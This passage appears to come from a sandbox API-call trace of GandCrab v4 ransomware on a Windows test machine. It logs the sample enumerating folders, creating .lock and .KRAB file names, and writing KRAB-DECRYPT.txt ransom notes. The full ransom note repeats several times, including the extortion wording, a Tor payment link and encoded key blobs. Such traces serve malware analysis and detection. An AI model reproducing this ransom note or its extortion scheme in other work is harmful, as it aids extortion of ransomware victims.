AdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0073.982] WriteFile (in: hFile=0x40c, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e320, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e320*=0x1f6e, lpOverlapped=0x0) returned 1 [0073.985] CloseHandle (hObject=0x40c) returned 1 [0073.985] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.986] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.986] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x15, wMilliseconds=0xbd)) [0073.986] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.986] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.986] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.987] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\d2ca4a08d2ca4dee3d.lock") returned 101 [0073.987] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x40c [0073.989] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.989] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.989] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\") returned 78 [0073.989] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*" [0073.990] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\*", lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 0x10239b8 [0073.990] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.990] FindNextFileW (in: hFindFile=0x10239b8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0073.990] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.990] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.990] FindNextFileW (in: hFindFile=0x10239b8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0073.990] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0073.990] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0073.990] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\d2ca4a08d2ca4dee3d.lock" [0073.990] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.990] wsprintfW (in: param_1=0x2ea0000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 106 [0073.990] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\d2ca4a08d2ca4dee3d.lock") returned 101 [0073.990] lstrlenW (lpString=".lock") returned 5 [0073.991] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.991] wsprintfW (in: param_1=0x2f30000, param_2="%s " | out: param_1=".lock ") returned 6 [0073.991] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.991] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.991] FindNextFileW (in: hFindFile=0x10239b8, lpFindFileData=0x338e350 | out: lpFindFileData=0x338e350) returned 1 [0073.991] lstrcmpW (lpString1="Document Themes", lpString2=".") returned 1 [0073.991] lstrcmpW (lpString1="Document Themes", lpString2="..") returned 1 [0073.992] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\", lpString2="Document Themes" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes" [0073.992] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\" [0073.992] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0073.992] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0073.992] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0073.992] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0073.992] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0073.992] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.992] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.993] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\\\KRAB-DECRYPT.txt") returned 111 [0073.993] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x468 [0073.993] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0073.994] WriteFile (in: hFile=0x468, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338e0a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338e0a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0073.994] CloseHandle (hObject=0x468) returned 1 [0073.995] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.995] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0073.995] GetSystemTime (in: lpSystemTime=0x2ea0400 | out: lpSystemTime=0x2ea0400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x15, wMilliseconds=0xbd)) [0073.995] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0073.996] GetWindowsDirectoryW (in: lpBuffer=0x2f30000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0073.996] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2f30200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2f30600, lpMaximumComponentLength=0x2f30608, lpFileSystemFlags=0x2f30604, lpFileSystemNameBuffer=0x2f30400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2f30600*=0xd2ca4def, lpMaximumComponentLength=0x2f30608*=0xff, lpFileSystemFlags=0x2f30604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0073.996] wsprintfW (in: param_1=0x2ea0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\d2ca4a08d2ca4dee3d.lock") returned 117 [0073.996] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x468 [0073.998] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.998] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0073.999] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\") returned 94 [0073.999] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*" [0073.999] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\*", lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 0x1023e38 [0073.999] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.999] FindNextFileW (in: hFindFile=0x1023e38, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0073.999] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0073.999] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.999] FindNextFileW (in: hFindFile=0x1023e38, lpFindFileData=0x338e0d0 | out: lpFindFileData=0x338e0d0) returned 1 [0073.999] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0073.999] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0073.999] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\", lpString2="1033" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033" [0073.999] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\" [0073.999] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2ea0000 [0074.000] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0074.000] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0074.000] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0074.000] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2ea0000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0074.000] VirtualFree (lpAddress=0x2ea0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0074.000] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2ea0000 [0074.003] wsprintfW (in: param_1=0x2ea0200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\\\KRAB-DECRYPT.txt") returned 116 [0074.003] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\16\\User\\Document Themes\\1033\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\microsoft\\templates\\livecontent\\16\\user\\document themes\\1033\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x470 [0074.006] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\nlAQAAHPTUHGrjb/dcqUrzDS2xomeC8P4CUSPNAOL+0Mo/RbLr0OaWU1FJb00XfFHXj6tOuf3fPEItNktL2VhtINGOMGKEAUgRHIwxSGaKwcSkEjDUL0HUwplREArY2eQK/2FlKmtVxY2cgAjLoWFXtwo2gEK4a1eyVpOdA/5PKA19vmu9D7IWlFZ8M2v2HcmX1WFwMSKKyCPyE3I12HtIyga2yppmGj/0kbeo4Pyss0DfwD9qQhlmbNwHCOobnSofdvP3cINJt0T+mj6E/gguxJb77VutzLS7ATQylX2An2d2MzGDkSiNzUWV0yDTYzmL5WDSsSyVbWoOteqpx5W43Cfpby5H7iD4Mk5vDzBWPVFeBH4GhKSNudNQl6iOb1l4eeUMuEBXGw0+BpkUrUAgQjBWLbJ6CleUr6MmODOH6A7Jhf60sNPZMijoWaqeecabt0KEf7vwtAKjxeXkDnboIObW61GiYye3Y4Tx1l6X4ZFSnOs4j5jePpy6IWD50Buvy4RFZAKh09rDrTVp5PPV5K0wx5ROUVxEFDMbKemGWn2kbJiiMXWKf9il9ecR7Vj6B9X2QxCxUUzPoOCetcS51SFmTzpNC24BpHiYhlhwBirS7mEqg9eHAs2+76DlthH0IYBlLrEZfZyF2GmyxnNSuiRvf66muc7RQYfG3jxGAECcWKNLqKv8fvy6Z8TXe6Wy3TAJ9Bs4xTAPNS0SMF465Ku6H3cEM/+Sga6KajwZhU3AgixnVgyRE321c0dFCBWzWXYlI72JWaaZIHuktcbpqOdgIM0s1zRRiik4jAuC9jbkuK4dcgArE7p/ZEF5efpIhovrn/JleylI8aSPNqecB9NGmRzRYsl1yx7R79uHvMfZXs9u6R7v6sJyePFcv2fFnDq/8LyXgfBE9ECjLuiUlSkGewajMUrZ37SpbSW8OrKVHO/wBgi22J5C1kUjTYx7CQfDqZArf9qjhD5TjMiNMJUTOcANT1k8LdJCX5YnEkqbql9zAKGPD3h85JtJy5d5qZmc1qVDvNq4JgortqMJN+wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7H